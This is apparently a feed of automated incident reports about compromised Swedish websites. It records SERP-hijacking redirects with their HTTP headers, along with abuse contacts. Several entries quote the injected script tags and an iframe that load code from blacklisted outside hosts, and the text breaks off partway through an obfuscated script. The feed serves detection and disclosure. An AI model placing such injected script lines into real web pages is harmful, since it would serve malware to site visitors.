Säkrare hemsida med .sehttp://addalot.se/ (194.237.215.180) - Serp-hijackingAttacked url: http://addalot.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 23 May 2018 10:48:14 +0200<br><br>Visitors with referer are redirected to http://www.pascl.fr/#360architecture.com <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: addalot.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: no-cache <br>Pragma: no-cache <br>Content-Length: 9554 <br>Content-Type: text/html; charset=utf-8 <br>Expires: -1 <br>Server: Microsoft-IIS/7.5 <br>X-AspNetMvc-Version: 5.2 <br>X-AspNet-Version: 4.0.30319 <br>X-Powered-By: ASP.NET <br>Date: Wed, 23 May 2018 08:48:03 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: addalot.se <br>Referer: http://www.google.com/search?q=addalot.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Cache-Control: private <br>Transfer-Encoding: chunked <br>Content-Type: text/html; charset=utf-8 <br>Location: http://www.pascl.fr/#360architecture.com <br>Server: Microsoft-IIS/7.5 <br>X-AspNet-Version: 4.0.30319 <br>X-Powered-By: ASP.NET <br>Date: Wed, 23 May 2018 08:48:02 GMT <br>Connection: close<br><br>addalot.se is on 194.237.215.180<br>ASN for 194.237.215.180: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>194.237.215.180 corresponds with iis8.space2u.com<br>Abuse.net has 1 reliable address(es) for space2u.com<br>Found address(es): abuse@space2u.com1527077751http://addalot.se/ (194.237.215.180) - Serp-hijackingAttacked url: http://addalot.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 14 May 2018 19:43:32 +0200<br><br>Visitors with referer are redirected to http://www.pascl.fr/#360architecture.com <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: addalot.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: no-cache <br>Pragma: no-cache <br>Content-Length: 9554 <br>Content-Type: text/html; charset=utf-8 <br>Expires: -1 <br>Server: Microsoft-IIS/7.5 <br>X-AspNetMvc-Version: 5.2 <br>X-AspNet-Version: 4.0.30319 <br>X-Powered-By: ASP.NET <br>Date: Mon, 14 May 2018 17:43:31 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: addalot.se <br>Referer: http://www.google.com/search?q=addalot.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Cache-Control: private <br>Transfer-Encoding: chunked <br>Content-Type: text/html; charset=utf-8 <br>Location: http://www.pascl.fr/#360architecture.com <br>Server: Microsoft-IIS/7.5 <br>X-AspNet-Version: 4.0.30319 <br>X-Powered-By: ASP.NET <br>Date: Mon, 14 May 2018 17:43:27 GMT <br>Connection: close<br><br>addalot.se is on 194.237.215.180<br>ASN for 194.237.215.180: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>194.237.215.180 corresponds with iis8.space2u.com<br>Abuse.net has 1 reliable address(es) for space2u.com<br>Found address(es): abuse@space2u.com1526386228http://xn--fljeln-xxa.se/ (194.237.215.180) - Serp-hijackingAttacked url: http://xn--fljeln-xxa.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 14 May 2018 15:22:43 +0200<br><br>Visitors with referer are redirected to http://www.pascl.fr/#360architecture.com <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: xn--fljeln-xxa.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 5558 <br>Content-Type: text/html; charset=utf-8 <br>Server: Microsoft-IIS/7.5 <br>X-AspNetMvc-Version: 2.0 <br>X-AspNet-Version: 4.0.30319 <br>X-Powered-By: ASP.NET <br>Date: Mon, 14 May 2018 13:22:43 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: xn--fljeln-xxa.se <br>Referer: http://www.google.com/search?q=xn--fljeln-xxa.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Cache-Control: private <br>Transfer-Encoding: chunked <br>Content-Type: text/html; charset=utf-8 <br>Location: http://www.pascl.fr/#360architecture.com <br>Server: Microsoft-IIS/7.5 <br>X-AspNet-Version: 4.0.30319 <br>X-Powered-By: ASP.NET <br>Date: Mon, 14 May 2018 13:22:42 GMT <br>Connection: close<br><br>xn--fljeln-xxa.se is on 194.237.215.180<br>ASN for 194.237.215.180: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>194.237.215.180 corresponds with iis8.space2u.com<br>Abuse.net has 1 reliable address(es) for space2u.com<br>Found address(es): abuse@space2u.com1526386094http://aquelium.nu/ (81.236.49.251) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://heirem-art.de/crpzw3bh.php?id=3341973&quot;&gt;<br><br>Offensive url: http://heirem-art.de/crpzw3bh.php?id=3341973<br>Url is blacklisted in Google Safe Browsing<br><br>aquelium.nu is on 81.236.49.251<br>ASN for 81.236.49.251: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>81.236.49.251 corresponds with lb-win.webhosting.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1522065780http://aquelium.nu/ (81.236.49.251) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://heirem-art.de/crpzw3bh.php?id=3341973&quot;&gt;<br><br>Offensive url: http://heirem-art.de/crpzw3bh.php?id=3341973<br>Url is blacklisted in Google Safe Browsing<br><br>aquelium.nu is on 81.236.49.251<br>ASN for 81.236.49.251: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>81.236.49.251 corresponds with lb-win.webhosting.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1520514159http://aquelius.se/ (81.236.49.251) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://mtmoriahcogic.org/zk7qvbjh.php?id=14607427&quot;&gt;<br><br>Offensive url: http://mtmoriahcogic.org/zk7qvbjh.php?id=14607427<br>Url is blacklisted in Google Safe Browsing<br><br>aquelius.se is on 81.236.49.251<br>ASN for 81.236.49.251: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>81.236.49.251 corresponds with lb-win.webhosting.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1519900489http://aquelius.se/ (81.236.49.251) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://mtmoriahcogic.org/zk7qvbjh.php?id=14607427&quot;&gt;<br><br>Offensive url: http://mtmoriahcogic.org/zk7qvbjh.php?id=14607427<br>Url is blacklisted in Google Safe Browsing<br><br>aquelius.se is on 81.236.49.251<br>ASN for 81.236.49.251: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>81.236.49.251 corresponds with lb-win.webhosting.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1519733413http://aquelium.nu/ (81.236.49.251) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://heirem-art.de/crpzw3bh.php?id=3341973&quot;&gt;<br><br>Offensive url: http://heirem-art.de/crpzw3bh.php?id=3341973<br>Url is blacklisted in Google Safe Browsing<br><br>aquelium.nu is on 81.236.49.251<br>ASN for 81.236.49.251: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>81.236.49.251 corresponds with lb-win.webhosting.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1518786402http://aquelium.nu/ (81.236.49.251) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://heirem-art.de/crpzw3bh.php?id=3341973&quot;&gt;<br><br>Offensive url: http://heirem-art.de/crpzw3bh.php?id=3341973<br>Url is blacklisted in Google Safe Browsing<br><br>aquelium.nu is on 81.236.49.251<br>ASN for 81.236.49.251: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>81.236.49.251 corresponds with lb-win.webhosting.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1503491161http://aquelius.se/ (81.236.49.251) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://mtmoriahcogic.org/zk7qvbjh.php?id=14607427&quot;&gt;<br><br>Offensive url: http://mtmoriahcogic.org/zk7qvbjh.php?id=14607427<br>Url is blacklisted in Google Safe Browsing<br><br>aquelius.se is on 81.236.49.251<br>ASN for 81.236.49.251: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>81.236.49.251 corresponds with lb-win.webhosting.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1503408537http://xn--lastskring-u5a.se/ (90.226.235.77) - MalwareOffensive html code:<br>&lt;script type='text/javascript' src='http://www.cargoloading.eu/wp-content/themes/twentyseventeen/assets/js/html5.js?ver=3.7.3'&gt;<br><br>Offensive url: http://www.cargoloading.eu/wp-content/themes/twentyseventeen/assets/js/html5.js?ver=3.7.3<br>Url is blacklisted in Google Safe Browsing<br><br>xn--lastskring-u5a.se is on 90.226.235.77<br>ASN for 90.226.235.77: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>90.226.235.77 corresponds with 90-226-235-77-no530.tbcn.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1502711668http://aquelium.se/ (81.236.49.251) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://heirem-art.de/crpzw3bh.php?id=3342702&quot;&gt;<br><br>Offensive url: http://heirem-art.de/crpzw3bh.php?id=3342702<br>Url is blacklisted in Google Safe Browsing<br><br>aquelium.se is on 81.236.49.251<br>ASN for 81.236.49.251: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>81.236.49.251 corresponds with lb-win.webhosting.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1490703446http://petragunnarsson.se/ (31.216.35.3) - Serp-hijackingAttacked url: http://petragunnarsson.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 15 Mar 2017 10:26:30 +0100<br><br>Visitors with referer are redirected to http://247worldstorewrxe.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Wed, 15 Mar 2017 09:26:28 GMT <br>Server: Apache/2.2.3 (CentOS) <br>X-Pingback: http://www.petragunnarsson.se/xmlrpc.php <br>Location: http://www.petragunnarsson.se/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html; charset=UTF-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Referer: http://www.google.com/search?q=petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Wed, 15 Mar 2017 09:26:27 GMT <br>Server: Apache/2.2.3 (CentOS) <br>Location: http://247worldstorewrxe.com/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html<br><br>petragunnarsson.se is on 31.216.35.3<br>ASN for 31.216.35.3: 3301<br>Abusix contact information: abuse@cygate.se (information only)<br>31.216.35.3 corresponds with shwl-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0040.s.thehostingplatform.com<br>Found address in whois: abuse@cygate.se1489586545http://petragunnarsson.se/ (31.216.35.3) - Serp-hijackingAttacked url: http://petragunnarsson.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 06 Mar 2017 14:45:42 +0100<br><br>Visitors with referer are redirected to http://247worldstorerxe.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Mon, 06 Mar 2017 13:45:41 GMT <br>Server: Apache/2.2.3 (CentOS) <br>X-Pingback: http://www.petragunnarsson.se/xmlrpc.php <br>Location: http://www.petragunnarsson.se/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html; charset=UTF-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Referer: http://www.google.com/search?q=petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Mon, 06 Mar 2017 13:45:41 GMT <br>Server: Apache/2.2.3 (CentOS) <br>Location: http://247worldstorerxe.com/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html<br><br>petragunnarsson.se is on 31.216.35.3<br>ASN for 31.216.35.3: 3301<br>Abusix contact information: abuse@cygate.se (information only)<br>31.216.35.3 corresponds with shwl-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0040.s.thehostingplatform.com<br>Found address in whois: abuse@cygate.se1488878669http://petragunnarsson.se/ (31.216.35.3) - Serp-hijackingAttacked url: http://petragunnarsson.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 28 Feb 2017 01:34:55 +0100<br><br>Visitors with referer are redirected to http://247worldstorerxe.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Tue, 28 Feb 2017 00:34:54 GMT <br>Server: Apache/2.2.3 (CentOS) <br>X-Pingback: http://www.petragunnarsson.se/xmlrpc.php <br>Location: http://www.petragunnarsson.se/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html; charset=UTF-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Referer: http://www.google.com/search?q=petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Tue, 28 Feb 2017 00:34:53 GMT <br>Server: Apache/2.2.3 (CentOS) <br>Location: http://247worldstorerxe.com/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html<br><br>petragunnarsson.se is on 31.216.35.3<br>ASN for 31.216.35.3: 3301<br>Abusix contact information: abuse@cygate.se (information only)<br>31.216.35.3 corresponds with shwl-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0040.s.thehostingplatform.com<br>Found address in whois: abuse@cygate.se1488265832http://aquelius.se/ (81.236.49.251) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://mtmoriahcogic.org/zk7qvbjh.php?id=14607427&quot;&gt;<br><br>Offensive url: http://mtmoriahcogic.org/zk7qvbjh.php?id=14607427<br>Url is blacklisted in Google Safe Browsing<br><br>aquelius.se is on 81.236.49.251<br>ASN for 81.236.49.251: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>81.236.49.251 corresponds with lb-win.webhosting.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1488265823http://poptek.se/ (213.180.89.66) - Serp-hijackingAttacked url: http://poptek.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 22 Feb 2017 13:32:36 +0100<br><br>Visitors with referer are redirected to http://www.coins200.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: poptek.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Connection: close <br>Date: Wed, 22 Feb 2017 12:32:36 GMT <br>Server: Microsoft-IIS/6.0 <br>X-Powered-By-Plesk: PleskWin <br>MicrosoftOfficeWebServer: 5.0_Pub <br>X-Powered-By: ASP.NET <br>Content-Length: 5778 <br>Content-Type: text/html <br>Set-Cookie: ASPSESSIONIDQABSRBQT=BFKKMIFCDAECCDGJBNHKDIKM; path=/ <br>Cache-control: private <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: poptek.se <br>Referer: http://www.google.com/search?q=poptek.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Connection: close <br>Date: Wed, 22 Feb 2017 12:32:36 GMT <br>Server: Microsoft-IIS/6.0 <br>X-Powered-By-Plesk: PleskWin <br>MicrosoftOfficeWebServer: 5.0_Pub <br>X-Powered-By: ASP.NET <br>Location: http://www.coins200.com/ <br>Content-Length: 145 <br>Content-Type: text/html <br>Set-Cookie: ASPSESSIONIDQABSRBQT=AFKKMIFCKGCAGLOBGOBHLHBH; path=/ <br>Cache-control: private<br><br>poptek.se is on 213.180.89.66<br>ASN for 213.180.89.66: 3301<br>Abusix contact information: abuse@cygate.se (information only)<br>213.180.89.66 corresponds with shww-0001.s.ipeer.se<br>Abuse.net has 1 reliable address(es) for ipeer.se<br>Found address(es): abuse@ipeer.se1487767989http://petragunnarsson.se/ (31.216.35.3) - Serp-hijackingAttacked url: http://petragunnarsson.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 23 Jan 2017 23:04:21 +0100<br><br>Visitors with referer are redirected to http://247worldstorerxe.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Mon, 23 Jan 2017 22:04:07 GMT <br>Server: Apache/2.2.3 (CentOS) <br>X-Pingback: http://www.petragunnarsson.se/xmlrpc.php <br>Location: http://www.petragunnarsson.se/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html; charset=UTF-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Referer: http://www.google.com/search?q=petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Mon, 23 Jan 2017 22:04:07 GMT <br>Server: Apache/2.2.3 (CentOS) <br>Location: http://247worldstorerxe.com/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html<br><br>petragunnarsson.se is on 31.216.35.3<br>ASN for 31.216.35.3: 3301<br>Abusix contact information: abuse@cygate.se (information only)<br>31.216.35.3 corresponds with shwl-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0040.s.thehostingplatform.com<br>Found address in whois: abuse@cygate.se1485249941http://anderssoderlund.se/ (31.216.35.4) - Serp-hijackingAttacked url: http://anderssoderlund.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 11 Jan 2017 19:08:07 +0100<br><br>Visitors with referer are redirected to http://www.buyfifaing.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: anderssoderlund.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 137 <br>Content-Type: text/html <br>Expires: Wed, 11 Jan 2017 18:06:02 GMT <br>Location: index.asp?page=1 <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDCCQRCSSA=GHKDCKDDJHFGKJAHPCEMDIEH; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Wed, 11 Jan 2017 18:07:02 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: anderssoderlund.se <br>Referer: http://www.google.com/search?q=anderssoderlund.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 147 <br>Content-Type: text/html <br>Location: http://www.buyfifaing.com/ <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDCCQRCSSA=FHKDCKDDKJGLLOOALBGMENPM; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Wed, 11 Jan 2017 18:07:02 GMT <br>Connection: close<br><br>anderssoderlund.se is on 31.216.35.4<br>ASN for 31.216.35.4: 3301<br>Abusix contact information: abuse@cygate.se (information only)<br>31.216.35.4 corresponds with shww-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shww-0040.s.thehostingplatform.com<br>Found address in whois: abuse@cygate.se1484204202http://xn--lund-histad-wfb.se/ (31.216.35.4) - Serp-hijackingAttacked url: http://xn--lund-histad-wfb.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 24 Nov 2016 11:25:37 +0100<br><br>Visitors with referer are redirected to http://www.coins200.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: xn--lund-histad-wfb.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 8327 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDASSSATRB=CKCBCLKCLPFCLCAHOJFAKKMJ; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Thu, 24 Nov 2016 10:25:36 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: xn--lund-histad-wfb.se <br>Referer: http://www.google.com/search?q=xn--lund-histad-wfb.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 145 <br>Content-Type: text/html <br>Location: http://www.coins200.com/ <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDASSSATRB=BKCBCLKCABNECHIMGEOIHOEH; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Thu, 24 Nov 2016 10:25:36 GMT <br>Connection: close<br><br>xn--lund-histad-wfb.se is on 31.216.35.4<br>ASN for 31.216.35.4: 3301<br>Abusix contact information: abuse@cygate.se (information only)<br>31.216.35.4 corresponds with shww-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shww-0040.s.thehostingplatform.com<br>Found address in whois: abuse@cygate.se1479994211http://petragunnarsson.se/ (31.216.35.3) - Serp-hijackingAttacked url: http://petragunnarsson.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Sun, 20 Nov 2016 20:26:52 +0100<br><br>Visitors with referer are redirected to http://247worldstorerxe.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Sun, 20 Nov 2016 19:26:46 GMT <br>Server: Apache/2.2.3 (CentOS) <br>X-Pingback: http://www.petragunnarsson.se/xmlrpc.php <br>Location: http://www.petragunnarsson.se/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html; charset=UTF-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Referer: http://www.google.com/search?q=petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Sun, 20 Nov 2016 19:26:45 GMT <br>Server: Apache/2.2.3 (CentOS) <br>Location: http://247worldstorerxe.com/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html<br><br>petragunnarsson.se is on 31.216.35.3<br>ASN for 31.216.35.3: 3301<br>Abusix contact information: abuse@cygate.se (information only)<br>31.216.35.3 corresponds with shwl-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0040.s.thehostingplatform.com<br>Found address in whois: abuse@cygate.se1479715131http://lund-hoistad.se/ (31.216.35.4) - Serp-hijackingAttacked url: http://lund-hoistad.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Fri, 11 Nov 2016 07:39:44 +0100<br><br>Visitors with referer are redirected to http://www.coins200.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: lund-hoistad.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 8327 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDAARSBTQB=JEOHNDLCHBKKNKFOBCAOBNEC; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Fri, 11 Nov 2016 06:39:40 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: lund-hoistad.se <br>Referer: http://www.google.com/search?q=lund-hoistad.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 145 <br>Content-Type: text/html <br>Location: http://www.coins200.com/ <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDAARSBTQB=IEOHNDLCGMKJEGGPDMKGAFFJ; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Fri, 11 Nov 2016 06:39:40 GMT <br>Connection: close<br><br>lund-hoistad.se is on 31.216.35.4<br>ASN for 31.216.35.4: 3301<br>Abusix contact information: (information only)<br>31.216.35.4 corresponds with shww-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shww-0040.s.thehostingplatform.com<br>Found address in whois: abuse@cygate.se1478853408http://poptek.se/ (213.180.89.66) - Serp-hijackingAttacked url: http://poptek.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 10 Nov 2016 19:19:14 +0100<br><br>Visitors with referer are redirected to http://www.coins200.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: poptek.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Connection: close <br>Date: Thu, 10 Nov 2016 18:19:14 GMT <br>Server: Microsoft-IIS/6.0 <br>X-Powered-By-Plesk: PleskWin <br>MicrosoftOfficeWebServer: 5.0_Pub <br>X-Powered-By: ASP.NET <br>Content-Length: 5778 <br>Content-Type: text/html <br>Set-Cookie: ASPSESSIONIDQCDSSASQ=ANGDJGECNDNLOIEMFNDEMMPD; path=/ <br>Cache-control: private <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: poptek.se <br>Referer: http://www.google.com/search?q=poptek.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Connection: close <br>Date: Thu, 10 Nov 2016 18:19:14 GMT <br>Server: Microsoft-IIS/6.0 <br>X-Powered-By-Plesk: PleskWin <br>MicrosoftOfficeWebServer: 5.0_Pub <br>X-Powered-By: ASP.NET <br>Location: http://www.coins200.com/ <br>Content-Length: 145 <br>Content-Type: text/html <br>Set-Cookie: ASPSESSIONIDQCDSSASQ=PMGDJGECAENIJIKMIJMAKOBO; path=/ <br>Cache-control: private<br><br>poptek.se is on 213.180.89.66<br>ASN for 213.180.89.66: 3301<br>Abusix contact information: abuse@cygate.se (information only)<br>213.180.89.66 corresponds with shww-0001.s.ipeer.se<br>Abuse.net has 1 reliable address(es) for ipeer.se<br>Found address(es): abuse@ipeer.se1478853395http://kulturbus.se/ (195.67.82.205) - MalwareOffensive html code:<br>&lt;iframe src=&quot;http://blmfgsquv.ddnsking.com/wordpress/?ARX8&quot; width=&quot;250&quot; height=&quot;250&quot;&gt;<br><br>Offensive url: http://blmfgsquv.ddnsking.com/wordpress/?ARX8<br>Url is blacklisted in Google Safe Browsing<br><br>kulturbus.se is on 195.67.82.205<br>ASN for 195.67.82.205: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>195.67.82.205 corresponds with mail.kalmarit.com<br>Abuse.net does not have any reliable address for mail.kalmarit.com<br>Found address in whois: abuse@telia.com1473236249http://neforetag.se/ (81.91.13.75) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://test.staow.com/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://test.staow.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return 